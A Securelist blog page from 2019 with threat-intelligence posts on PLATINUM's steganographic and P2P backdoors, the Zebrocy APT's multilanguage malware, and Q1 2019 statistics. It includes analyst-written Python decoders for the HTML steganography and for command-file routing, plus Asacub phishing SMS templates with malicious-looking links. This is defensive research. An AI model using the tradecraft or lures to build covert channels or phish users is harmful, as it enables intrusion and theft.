Alongside entertainment, children also use the Internet for educational purposes. The largest share of queries on the education topic were in Russian.

Distribution of search queries on the Education topic in different languages, May 2018 – May 2019


Every year, we see increasing numbers of children going online from mobile devices. Whereas this trend used to be more pronounced in Western countries than in the Arab world and Latin America, kids in these regions too are starting to switch to mobile platforms.

This is evidenced, above all, by the decrease in the number of visits to social networking sites from PCs. Developers are actively supporting users’ transition to mobile devices, adapting their services to smartphone screens. New social networks aimed exclusively at smartphones are becoming extremely popular with children and teenagers, who pick up innovations before adults do. Last year, for instance, the world of social networks was rocked by TikTok; Instagram and SnapChat are also increasing their audiences. Despite remaining the most popular social network in the world, Facebook is attracting ever fewer children and teenagers in the West.

Games, just like social networks, are increasingly shifting to mobile platforms. A good example is Fortnite, which children prefer to play on mobile devices and is (according to search queries) more popular than Roblox and Minecraft.

When it comes to online shopping, children still favor PCs. This is not surprising, since not all online stores have a user-friendly app or mobile version. Not for the first year did we see a rise in the popularity of the Software, Audio, Video category. And it was the first year that it dislodged the Online Communication category from the top of the leaderboard. Children increasingly prefer to spend time watching videos on YouTube, and in addition to clips on the video hosting site, they also showed interest in Game of Thrones, the series Riverdale, and the latest Avengers.

We recommend using parental control to keep tabs on what children are looking at. Kaspersky Lab’s parental control component forms part of the Kaspersky Internet Security and Kaspersky Total Security solutions. We also have a separate product, Kaspersky Safe Kids, which not only prevents children from accessing undesirable websites, but notifies parents about what their children have been searching for online, and helps track their location and manage their gadget time.

5 June 2019

Platinum is back

In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels. The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.

As a first stage the operators used WMI subscriptions to run an initial PowerShell downloader which, in turn, downloaded another small PowerShell backdoor. We collected many of the initial WMI PowerShell scripts and noticed that they had different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning the malware only worked during a certain period of time every day). The C&C addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

At the time, we were investigating another threat, which we believe to be the second stage of the same campaign. We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc. The backdoor also has a few very interesting features of its own. For example, it can hide all communication with its C&C server by using text steganography.

After deeper analysis we realized that the two threats were related. Among other things, both attacks used the same domain to store exfiltrated data, and we discovered that some of the victims were infected by both types of malware at the same time. It’s worth mentioning that in the second stage, all executable files were protected with a runtime crypter and after unpacking them we found another, previously undiscovered, backdoor that is known to be related to PLATINUM.

Our paper only includes a description of the two previously undiscovered backdoors while the full report is available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Steganography backdoor

The main binary backdoor is installed with a dedicated dropper. When the dropper is run, it decrypts files that are embedded into its “.arch” section:

Next, it creates directories for the backdoor to operate in and saves the malware-related files in these. It normally uses paths like those used by legitimate software.

Typically, the malware drops two files: the backdoor itself and its configuration file.

After this, the dropper runs the backdoor, installs it to enable a persistence mechanism and removes itself. The configuration file always has a .cfg or .dat extension and contains the following options, encrypted with AES-256 CBC and encoded:

  • pr – stands for “Poll Retries” and specifies the interval in minutes after which the malware sends the C&C server a request for new commands to execute;
  • ht – unused;
  • sl – specifies the date and time when the malware starts running. When the date arrives, the malware clears this option;
  • opt – stands for “Office Hours”. This specifies the hours and minutes during the day when the malware is active;
  • die – stands for “Eradicate Days”. This specifies how many days the malware will work inside the victim’s computer;
  • Section “p” lists malware C&C addresses;
  • Section “t” lists legitimate URLs that will be used to ensure that an internet connection is available.

The main backdoor is implemented as a dynamic link library (DLL) and exports a function with the name “NSPStartup”. After dropping it, the installer registers the backdoor as a winsock2 namespace provider with the help of the WSCInstallNameSpace API function and activates it by calling WSCEnableNSProvider.

As a result of this installation, during initialization of the “svchost -k netsvcs” process upon system startup, the registered namespace provider will be loaded into the address space of the process and the function “NSPStartup” will be called.

C&C interaction

Once up and running, the backdoor compares the current time against the “Eradicate Days”, activation date and “Office Hours” values, and locates valid proxy credentials in “Credential Store” and “Protected Storage”.

When all the rules are fulfilled, the backdoor connects to the malware server and downloads an HTML page.

On the face of it, the HTML suggests that the C&C server is down:

However, this is because of the steganography. The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <--1234567890> tag (see below).

On line 31, the attributes “align”, “bgcolor”, “colspan” and “rowspan” are listed in alphabetical order, whereas on line 32 the same attributes are listed in a different order. The first steganography technique relies on the fact that HTML is indifferent to the order of tag attributes, so a message can be encoded by permuting them. Line 31 in the example above contains four tags; four attributes can be arranged in 4! = 24 ways, and since log2(24) ≈ 4.58, each line encodes 4 bits of information. The backdoor decodes the page line by line and collects an encryption key for the data; the data itself is placed right after the HTML tags, also in encoded form, but using a second steganography technique.

The image above shows that the data is encoded as groups of spaces delimited with tabs. Each group contains from zero to seven spaces, and the number of spaces represents the next three bits of data. For example, the first group on line 944 contains six spaces, so it will be decoded as 6₁₀ = 110₂.

Decryption of the decoded data using the decoded AES-256 CBC key is a logical continuation.
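The following decoder is an added example written for this page to make the two decoding steps concrete; it is not code from the PLATINUM samples and not Kaspersky’s tooling. It assumes details the page does not state: that the attribute order maps to bits as the lexicographic rank of the permutation (alphabetical order being rank 0, of which the low four bits are used), that the whitespace payload sits on lines containing nothing but spaces and tabs, and that both bit streams are packed MSB-first into bytes. The sample page is constructed, and its recovered “key” is only four bytes long so the arithmetic can be checked by hand (a real AES-256 key is 32 bytes).

```python
"""Decoder for the two HTML steganography techniques described above.

Added example for this page, not PLATINUM code and not Kaspersky tooling.
Assumptions (not stated on the page): permutation -> lexicographic rank,
low 4 bits used; payload lines contain only spaces and tabs; bits are packed
MSB-first and leftover bits are padding.
"""
import re

CANONICAL = ("align", "bgcolor", "colspan", "rowspan")  # alphabetical order = rank 0
TAG_RE = re.compile(r"<td\b([^>]*)>", re.IGNORECASE)
ATTR_NAME_RE = re.compile(r"([A-Za-z]+)\s*=")
WHITESPACE_LINE_RE = re.compile(r"^[ \t]+$", re.MULTILINE)

# Constructed payload line: groups of 3,3,6,6,5,4 spaces = bits 011 011 110 110 101 100
PAYLOAD_LINE = "\t".join(" " * n for n in (3, 3, 6, 6, 5, 4)) + "\n"

SAMPLE_HTML = (  # constructed "site down" page carrying key b"KEY!" and data b"ok"
    "<html><body><p>Service temporarily unavailable</p>\n"
    "<table>\n"
    '<tr><td align="left" rowspan="1" bgcolor="#fff" colspan="1">a</td>'      # rank 4
    '<td bgcolor="#fff" rowspan="1" colspan="1" align="left">b</td></tr>\n'    # rank 11
    '<tr><td align="left" rowspan="1" bgcolor="#fff" colspan="1">c</td>'      # rank 4
    '<td align="left" rowspan="1" colspan="1" bgcolor="#fff">d</td></tr>\n'    # rank 5
    '<tr><td align="left" rowspan="1" colspan="1" bgcolor="#fff">e</td>'      # rank 5
    '<td bgcolor="#fff" colspan="1" rowspan="1" align="left">f</td></tr>\n'    # rank 9
    '<tr><td align="left" colspan="1" bgcolor="#fff" rowspan="1">g</td>'      # rank 2
    '<td align="left" bgcolor="#fff" rowspan="1" colspan="1">h</td></tr>\n'    # rank 1
    '<tr><td class="footer">no payload in this tag</td></tr>\n'
    "</table>\n"
) + PAYLOAD_LINE + "</body></html>\n"


def permutation_rank(order, canonical=CANONICAL):
    """Lexicographic rank (Lehmer code) of `order` among permutations of `canonical`."""
    remaining = list(canonical)
    rank = 0
    for name in order:
        idx = remaining.index(name)
        rank = rank * len(remaining) + idx
        remaining.pop(idx)
    return rank


def bits_to_bytes(bits):
    """Pack 0/1 ints MSB-first; trailing bits that do not fill a byte are dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def decode_attribute_order(html):
    """Technique 1: every <td> carrying exactly the four canonical attributes yields 4 bits."""
    bits = []
    for match in TAG_RE.finditer(html):
        names = [n.lower() for n in ATTR_NAME_RE.findall(match.group(1))]
        if sorted(names) != sorted(CANONICAL):
            continue  # ordinary tag, carries no data
        rank = permutation_rank(names) & 0xF  # assumption: only ranks 0..15 are used
        bits.extend((rank >> shift) & 1 for shift in (3, 2, 1, 0))
    return bits_to_bytes(bits)


def decode_whitespace(html):
    """Technique 2: tab-delimited groups of 0..7 spaces, each group is 3 bits."""
    bits = []
    for line in WHITESPACE_LINE_RE.findall(html):
        for group in line.split("\t"):
            if len(group) > 7:  # more than 7 spaces cannot be a 3-bit group
                raise ValueError("not a space/tab steganography line: %r" % line)
            bits.extend((len(group) >> shift) & 1 for shift in (2, 1, 0))
    return bits_to_bytes(bits)


def recover(html):
    """Run both decoders; the key would then feed AES-256 CBC decryption of the data."""
    return decode_attribute_order(html), decode_whitespace(html)


if __name__ == "__main__":
    key, data = recover(SAMPLE_HTML)
    print("key  :", key)   # b'KEY!'
    print("data :", data)  # b'ok'
```

On a real page the decoder should be restricted to the region inside the marker tag the text mentions, because the whitespace-only-line assumption would otherwise pick up ordinary indentation lines; the guard on groups longer than seven spaces is what flags such a false hit.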

The result is a list of commands to execute, protected the same way as the backdoor configuration file:

Raw command data extracted from the HTML page

An interpretation of the raw commands extracted from the HTML page after decryption


The backdoor that we’ve discovered supports the uploading, downloading and execution of files; it can also handle requests for a process list and directory list, upgrade and uninstall itself, and modify its configuration file. Each command has its own parameters, e.g. the C&C server that it requests to download or upload files from, or whether to split a file while uploading.

Config manager

While investigating further, we found another tool that turned out to be a configuration manager – an executable whose purpose was to create configuration and command files for the backdoors. The utility can configure more than 150 options.

For example, below is the result of executing the showcfg command.

The second command it supports is updatecfg, whose job was to put values specified by the operator into the configuration file.

Also, the config manager supports Upload, Download, Execute, Search, UpdateConfig, AddKeyword, ChangeKeywordFile, ChangeKey, Upgrade and Uninstall commands. After executing any of these it creates a command file, protected the same way as the configuration file, and stores it in the “CommandDir” directory (the path is specified in the configuration, option 11). As described in the ‘Steganography backdoor’ section, this backdoor doesn’t handle command files and doesn’t support commands such as ChangeKeywordFile and ChangeKey, so we figured that there was another backdoor, which made a pair with the config manager we had found. Although it would appear such a utility should run on the attacker side, we found a victim infected with this and a corresponding backdoor located in the vicinity. We called it a P2P backdoor.

P2P backdoor

This backdoor shares many features with the previous one. For example, many of the commands have similar names, both backdoors’ configuration files have options with identical names and are protected the same way, and the paths to the backdoor files are similar to legitimate ones. However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.

C&C interaction

This backdoor has the ability to sniff network traffic. After the backdoor is run, it starts a sniffer for each network interface, in order to detect a specially structured packet, which is sent to the victim’s ProbePort specified in the configuration. When the sniffer finds a packet like that, it interprets it as a request to establish a connection and sets TransferPort (specified in the configuration) to listening mode. The requester immediately connects to the victim’s TransferPort and both sides perform additional checks, exchanging their encryption keys. Then the connection requester sends commands to the victim, and the victim processes these interactively. This approach allows the backdoor to maintain listening mode without keeping any socket in listening mode – it only creates a listening socket when it knows that someone is trying to connect.


The backdoor supports the same commands as the steganography backdoor and implements an additional one. The backdoor leverages the Windows index service and can search files for keywords provided by the attacker. This search can be initiated by an attacker request or on a schedule – keywords for a scheduled search are stored in a dedicated file.

All commands are supplied to the backdoor through command files. The command files are protected the same way as the config (see below).

This consists of a command id (id), a command date (dt), a command name (t) and arguments (cmd).

The creators of the malware also provide the ability to combine infected victims into a P2P network. This can help the attacker, for example, when two infected victims share the same local network, but only one of them has access to the internet. In this case, the attacker can send a command file to the unreachable victim via the reachable one. The instruction for the reachable victim that the command is intended for the other host is placed directly inside the command file. When the attacker prepares the file, a list of infected hosts involved in transferring the file to the destination is included as the h1, h2, h3, etc. options. The order in which the command file will be transferred through the victims to the destination host is included as the p1, p2, etc. options. For example, if the p1 option equals ‘2->3->1’ and the p2 option equals to ‘2->3->4’ the command file will be delivered to the hosts with the indexes 1 and 4 through hosts 2 and then 3. Each host is described as follows: %Host IP%:%Host ProbePort%:%Host TransferPort%.
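An interpreter for the routing options just described (h1, h2, … host entries and p1, p2, … paths), written from the analyst's side to read a recovered command file; this is an added example, not the malware's code. It assumes, since the page does not show the layout, that the decrypted command file is a set of key=value lines, that host entries use the %IP%:%ProbePort%:%TransferPort% form given in the text, and that a path such as '2->3->1' lists host indexes from the first relay to the final destination.

```python
"""Reader for the P2P routing options (h<N> hosts, p<N> paths) of a
recovered command file. Added example, not the malware's code.

Assumptions not stated on the page: the decrypted file is key=value
lines; hosts are ip:probe_port:transfer_port; a path '2->3->1' runs from
the first relay to the destination.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

HOST_KEY = re.compile(r"^h(\d+)$")
PATH_KEY = re.compile(r"^p(\d+)$")


@dataclass(frozen=True)
class Host:
    index: int
    ip: str
    probe_port: int     # where the sniffer waits for the wake-up packet
    transfer_port: int  # opened only after the probe, for the transfer


@dataclass
class Route:
    relays: List[Host]  # hosts the command file passes through, in order
    destination: Host   # host that will actually execute the command


@dataclass
class CommandFile:
    cmd_id: str
    date: str
    name: str
    args: str
    hosts: Dict[int, Host] = field(default_factory=dict)
    routes: List[Route] = field(default_factory=list)


def parse_options(text: str) -> Dict[str, str]:
    """Split key=value lines; blank lines and '#' comments are ignored."""
    opts: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"malformed line: {raw!r}")
        opts[key.strip()] = value.strip()
    return opts


def parse_hosts(opts: Dict[str, str]) -> Dict[int, Host]:
    """Collect h<N> options into Host records keyed by N."""
    hosts: Dict[int, Host] = {}
    for key, value in opts.items():
        m = HOST_KEY.match(key)
        if not m:
            continue
        parts = value.split(":")
        if len(parts) != 3:
            raise ValueError(f"{key}: expected ip:probe:transfer, got {value!r}")
        idx = int(m.group(1))
        hosts[idx] = Host(idx, parts[0], int(parts[1]), int(parts[2]))
    return hosts


def parse_routes(opts: Dict[str, str], hosts: Dict[int, Host]) -> List[Route]:
    """Resolve each p<N> path ('2->3->1') into relay hosts plus destination."""
    routes: List[Route] = []
    keys = sorted((k for k in opts if PATH_KEY.match(k)), key=lambda k: int(k[1:]))
    for key in keys:
        indexes = [int(x) for x in opts[key].split("->")]
        missing = [i for i in indexes if i not in hosts]
        if missing:  # a path that names a host not listed in h<N> is malformed
            raise ValueError(f"{key} references undefined host(s) {missing}")
        chain = [hosts[i] for i in indexes]
        routes.append(Route(relays=chain[:-1], destination=chain[-1]))
    return routes


def parse_command_file(text: str) -> CommandFile:
    """Parse id/dt/t/cmd plus the routing options into one record."""
    opts = parse_options(text)
    hosts = parse_hosts(opts)
    return CommandFile(cmd_id=opts.get("id", ""), date=opts.get("dt", ""),
                       name=opts.get("t", ""), args=opts.get("cmd", ""),
                       hosts=hosts, routes=parse_routes(opts, hosts))


# Constructed sample using the page's p1/p2 example; addresses are from the
# documentation range 192.0.2.0/24 and the ports are made up.
SAMPLE_COMMAND_FILE = """\
id=17
dt=2019-03-01 12:00:00
t=Search
cmd=passport
h1=192.0.2.1:4000:4001
h2=192.0.2.2:4000:4001
h3=192.0.2.3:4000:4001
h4=192.0.2.4:4000:4001
p1=2->3->1
p2=2->3->4
"""

if __name__ == "__main__":
    for r in parse_command_file(SAMPLE_COMMAND_FILE).routes:
        hops = " -> ".join(str(h.index) for h in r.relays + [r.destination])
        print(f"{hops} ({r.destination.ip})")  # 2 -> 3 -> 1 (192.0.2.1) ...
```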


We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and here is proof: the actors used two interesting steganography techniques in this APT. One more interesting detail is that the actors decided to implement the utilities they need as one huge set – this reminds us of the framework-based architecture that is becoming more and more popular. Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.


This list includes only IoCs related to the described modules of the attack. All IoCs are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com)

3 June 2019

Zebrocy’s Multilanguage Malware Salad

Zebrocy is a Russian-speaking APT that presents a strange set of stripes. To keep things simple, there are three things to know about Zebrocy:

  • Zebrocy is an active sub-group of victim profiling and access specialists
  • Zebrocy maintains a lineage back through 2013, sharing malware artefacts and similarities with BlackEnergy
  • The past five years of Zebrocy infrastructure, malware set, and targeting have similarities and overlaps with both the Sofacy and BlackEnergy APTs, yet throughout that time it has remained different from both of those groups

We originally described a rare “Zebrocy Delphi payload” in late 2015 private reports. That malware set, activity, and infrastructure have greatly expanded. Its malware set has been coded in a half dozen languages or so. Related activity has gone on for years, spearphished hundreds of government, foreign affairs related, and military related targets, and initially was regarded as a Sofacy subset.

Essentially, in our SAS2019 presentation “Zebrocy’s Multilanguage Malware Salad”, we publicly provided for the first time original insights on Zebrocy and its characteristics, based on five years of research and private reports on this group:

  • Game is on – a small new Zebrocy spearphish wave with a new Golang downloader variant was sent out the week before SAS2019
  • Consistent profiling and process enumeration reporting behavior has been redeveloped and redeployed in Zebrocy backdoors across five+ years
  • Multiple bespoke second stage implants perform credential harvesting based on stage one process enumeration
  • Copy-and-paste coding tendencies
  • Complex overlaps with Sofacy and BlackEnergy/GreyEnergy over five years, suggesting a supportive role as a sub-group
  • Initial malware development and deployment lineage with BlackEnergy stretches back to 2013

While Zebrocy has never presented 0day exploits, this group’s lineage comes from not-so-humble BlackEnergy and Sofacy beginnings. The group presents an agile and capable malware set, its spearphishing and intrusion activity surged in volume in 2018, and its efficacy requires network defenders’ attention.

Zebrocy shares data points and crosses lines with other clusters of activity in unique and unexpected ways. Zebrocy initially shared limited infrastructure, targets, and interests with Sofacy. Zebrocy also shared malware code with the earlier BlackEnergy/Sandworm activity, and shared targeting, and later very limited infrastructure, with the more recent BlackEnergy/GreyEnergy activity. Oddly, Turla deployed spearphish macros almost identical to previous, non-public Zebrocy code in 2018.

It’s fantastic to see some of these same points being repeated publicly by other research teams. A previous claim that Zebrocy distributed Sofacy’s XAgent as a second stage implant remains unsubstantiated but now is replaced with findings identical to these following the SAS2019 presentation, so it seems we are all slowly getting on the same page.

A first course with new additions

When we originally documented a Zebrocy malware incident in late 2015, we noted an Oct 2015 AutoIT downloader and a Delphi backdoor payload. Since then, we have noted a virtual salad of Zebrocy code tossed together, built with a handful of languages, often ripped from various code sharing sites. Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits. Browser credential theft, keylogging, and Windows credential theft, along with some incidents of file and communications theft, are all on the list of Zebrocy second stage implant specials.

This Zebrocy dish is served before the main course – gaining and maintaining access is not an easy job. And, because the group seems to maintain lineage in both the 0day capable and destructive BlackEnergy/Sandworm APT and the prolific and 0day capable Sofacy APT, this course is very interesting. Let’s take a more intelligent perspective on the Zebrocy malware set and activity and its lineage, based on reporting provided to our private report customers covering the past five years.

It’s important to note that Zebrocy-related spearphishing activity continued into April 2019, in the week prior to SAS2019. Recent changes to its Go downloader variant make it clear that the Zebrocy malware set is still under active development. And observed activity continued into late May 2019. This activity is likely to continue throughout 2019.

Since the SAS2019 presentation, we have identified a new Zebrocy backdoor family, deployed with a new downloader. So Zebrocy continues to expand its malware set. There appears to be both a return to C coding for the group, and also an expansion with the Nim language in its arsenal. We will post a more thorough analysis and reference indicators to Securelist in the near future about this downloader, but we expect other vendors to see it as well. Zebrocy spearphished a fairly long list of targets throughout the world with a new Nim downloader, and here is a partial list of detection geolocations:

  • Kazakhstan
  • Tajikistan
  • Turkmenistan
  • Germany
  • Kyrgyzstan
  • United Kingdom
  • Myanmar
  • Syrian Arab Republic
  • Ukraine
  • Afghanistan
  • Tanzania
  • Iran

Setting a Zebrocy place

A relevant confluence of factors over the past five years is notable in regards to the group’s lineage. The Zebrocy Delphi payload arrived at the abrupt end of the two year Delphocy Delphi based campaign. And it’s important to note that this Delphocy Delphi backdoor was delivered alongside bootkit kernel loader components that maintained the same unique code as the BlackEnergy malware kernel loader. And overall, the malware set is innovative when compared to Sofacy, and maintains ongoing unexpected malware artefact similarities with BlackEnergy.

A set of Zebrocy related events best characterize years of the activity and help to carve out the group’s own profile, its lineage, malware set, infrastructure, and modus operandi.

  • Zebrocy lineage – early Sofacy infrastructure overlap (late 2015/early 2016) for the Zebrocy Delphi backdoor
  • Zebrocy lineage – Delphocy Delphi deployment and abrupt conclusion (2013 – late 2015), and start of Zebrocy Delphi timeline (late 2015)
  • Zebrocy lineage – shared, unique kernel code between BlackEnergy and Delphocy bootkit (2013 – 2015)
  • Zebrocy unique malware set – vintage Delphi programming coupled with unusual and agile development capabilities in newer managed languages like Python, C#, and Go, all of which perform screengrab, volume serial number ID, systeminfo and process list collection
  • Zebrocy ongoing targeting and infrastructure overlap – fairly recent BlackEnergy/GreyEnergy
  • Zebrocy matching spearphish macro artefact overlap – recent Turla

When we first reported on the Zebrocy package in early October 2015, this activity was not quite Sofacy and not quite BlackEnergy. Zebrocy spearphished diplomatic targets with a compiled AutoIT script that downloaded a new Delphi payload. This payload was unusual, as only the Delphocy backdoors and Madi backdoors from 2012 were well known APT related Delphi malware – Delphi programming itself is an unusual, older skill. These malware artefacts and campaign events suggested ties in the malware to BlackEnergy, while overlap in infrastructure suggested ties to Sofacy.

SAS2018 Claims and Predictions

Last year’s SAS2018 “Masha and these Bears” presentation focused on SPLM/XAgent Sofacy activity, but included mention of Zebrocy due to targeting overlap and shared interests. It was first to record and predict several items:

  • The full 2018 decline of SPLM/XAgent for the more traditional “Sofacy” activity
  • A coincidental new increase in Zebrocy activity
  • Shared build-id format with BlackEnergy modules
  • An expansion in Zebrocy spearphishing
  • An expansion in the managed languages the Zebrocy malware set is built on

These predictions later turned into global events, as lighter targeting turned into a massive global surge of Zebrocy activity, sometimes sharing targets between both Sofacy and Zebrocy. Also later that year, the Zebrocy malware set expanded with C#, Python, and Go. This wouldn’t be the first or last time we reported on this group’s innovative malware set.

Zebrocy Delphi backdoor shared artefacts rooted in Delphocy and BlackEnergy

The limited set of 2013-2015 Delphocy intrusions in Ukraine and Poland deployed a Delphi backdoor both with and without a bootkit loader. This bootkit loader included a routine that shares the same compiled code with only the BlackEnergy kernel loaders, helping to tie Zebrocy malware to the BlackEnergy malware set.

This unique encryption implementation was shared between BlackEnergy’s kernel loader, and Delphocy’s bootkit kernel loader code. The appearance of this code overlap coincides with several project events:

  • End of Delphocy/BlackEnergy overlapped code use, while BlackEnergy moved forward with other code
  • End of Delphocy’s user-mode Delphi payload (October 2015)
  • Start of Zebrocy’s Delphi payload (October 2015)

A particular chunk of kernel mode code for a custom encryption routine was shared across the older Delphocy bootkit and the BlackEnergy malware platform in 2013. While Delphocy replaced this bootkit with a simplified user-mode persistence technique, BlackEnergy malware continued using this code until late 2015. Then, these APTs discontinued both the Delphi-based Delphocy project and the use of this mysterious chunk of code within BlackEnergy malware. Almost immediately, Delphi-based Zebrocy backdoors began to be deployed. Several months later, a Zebrocy backdoor connected back to a domain that was registered by a particular email address. This address had been used to register another Sofacy domain hosted on a well-known Sofacy IP at the time (rammatica[.]com/raveston[.]com).

Note that both Delphocy’s and BlackEnergy’s kernel mode code appropriated unique content in 2013 from the Carberp codebase – hashing, injection, bootkit functionality. Surprisingly, this same unique encryption cipher was seen pasted again into 2018 VPNFilter code as well. Clearly it happens with other malware, but Zebrocy’s consistent copy/paste tendency is something not frequently seen in other APT malware with a “best use” date spanning five years or more. Portions of its AutoIT code were copied from code sharing forums and pasted into their own code. This is different from Sofacy’s disappeared and exhaustive SPLM/XAgent codebase. It was used for at least six years and was entirely custom-built.

Zebrocy’s mix

The Zebrocy malware set is tossed together from a wide set of languages and technologies, including both legitimate and malicious code shared on online forums and sites like Github and Pastebin. This repeated “copy/paste” practice is not frequently seen in Russian speaking APT malware sets, although open source and penetration testing/red teaming malware are frequently used by other groups, like Empire, Responder, BeEF, and Mimikatz. Also unusual, this Zebrocy malware assortment is frequently rebuilt on multiple languages, along with new malware components added to the mix.

  • AutoIT
  • Delphi
  • C#
  • PowerShell
  • Go
  • Python
  • Nim

AutoIT component

The group emailed zipped AutoIT attachments to at least a dozen targets in the first wave of Zebrocy spearphishing in early October 2015. The group is fairly successful in convincing recipients to open the attachments; generally around half of recipients attempted to open them. The AutoIT code is a target profiling component and downloader. It appears to have been developed with copy and paste coding talent from AutoIT scripting forums, Github, etc, tossed together from multiple sources. Here are a few:

The AutoIT executable contains over 60 functions listed in the script, with 10 of the most interesting functions listed here. The same initial profiling functionality is maintained almost four years later in various newer Go and C# downloader variants, with screengrabs, system info and running process collection built into the startup routine of each one. Unique victim ID’s, for example, are based on target systems’ volume serial number and collected and reported to its C2 in its initial connectback for ongoing tracking.

C# Zebrocy backdoor

Zebrocy pushed a C# backdoor that maintains much the same functionality as its other assortment of backdoor implementations.

Most interesting in this implementation is its consistent collection of screengrab and system information, and a list of running processes. Again, with this first stage backdoor, it is profiling its targets and looking for unexpected sources of credential collection to develop bespoke second stage credential harvesters against.

Delphi backdoor

The Zebrocy Delphi backdoor has been publicly documented fairly well, but its artefacts may have a more interesting part in the Zebrocy story. Because of the unusual ongoing presence of Delphi backdoors in its malware set, early Zebrocy roots appear to be planted in Delphocy malware deployed to Ukraine and Poland targets from early 2013 to late 2015. Also interesting is the unique encryption cipher implemented in both the 2013 Delphocy bootkit kernel mode loader and the BlackEnergy kernel modules, along with simple API hashing functions that both shared with Carberp. While Delphocy was deployed for a second version without the bootkit in 2015, the BlackEnergy platform continued to deploy with the shared kernel loader code until late 2015.

It does not seem to be merely coincidental that the very last of the BlackEnergy kernel mode components sharing this code with the Delphocy-related kernel loaders wilted at the very end of 2015 along with the Delphocy campaigns altogether. This came after the Delphocy project delivered a second round of Delphi variants without the bootkit loader. Meanwhile, Zebrocy Delphi variants grew from the initial row of Zebrocy Delphi implants in October 2015. While it is a loose connection, it seems more than just coincidental to observe unusual Delphi coding end with one activity set and begin with another activity set.


The group’s Go backdoors continued to be modified and deployed into late March 2019. These backdoors also include a large amount of code included from external sources. They also include the screengrab and system information collection, along with running process enumeration in order to profile targets and further inform their second stage credential harvesting efforts. Zebrocy Go backdoors have been sent out in waves over the past year, maintaining a variety of project strings seen below.

A second stage

These findings were particularly interesting in the light of past claims about SPLM/XAgent being the second stage of choice for Zebrocy, for which there was a lot of monitoring on our part, but never any data support. Some guesses were made about why that was, perhaps Zebrocy downloaders were all mitigated prior to attempting to download further stages? But never any answers.

Instead, we arrived at the answers ourselves. In order to account for unexpected software installations at victim systems, no matter which language, each first stage backdoor implementation collects a “system information” listing, screengrab, and enumerates running processes. This malware behavior was included in Zebrocy backdoors from the very first backdoor that we reported on, and continued into 2019 with the latest rounds of Go backdoors. After collected information is POSTed to the C2, a long delay ensues. Eventually, target systems may receive a custom built second stage implant to retrieve credentials from those unexpected software sources. More unusual software packages included little-known customized Chromium builds like CentBrowser and 7Star from Asian studios. In some cases, malware password stealers are deployed to address more common software.

In addition, Zebrocy file content stealers and keyloggers coded in C# were detected at targets in 2017 and 2018. Some of this code and their build id value format was reviewed in the SAS2018 “Masha and these Bears” presentation.

Served cold

Zebrocy version 2.2 called back to a domain sharing Whois and hosting resources with Sofacy in early 2016, and later versions used naming and URL constructs very similar to BlackEnergy resources. And since then, just like BlackEnergy, almost all of the Zebrocy C2 used no domain registrations. Communications directly to the host over IPv4 with no domain resolution are common behavior for the group’s malware. However, every now and then, Zebrocy malware calls back to servers located by hardcoded domain names.

Its ongoing activity demonstrates a long game commitment to gaining access to targeted networks. And as we predicted at SAS2018 and SAS2019, this latest new Nim coding adds to the growing list of languages for this malware set. We will see more from Zebrocy into 2019 on government and military related organizations.

23 May 2019

IT threat evolution Q1 2019. Statistics

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans

Mobile threats

Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

Number of detected malicious installation packages, Q2 2018 – Q1 2019

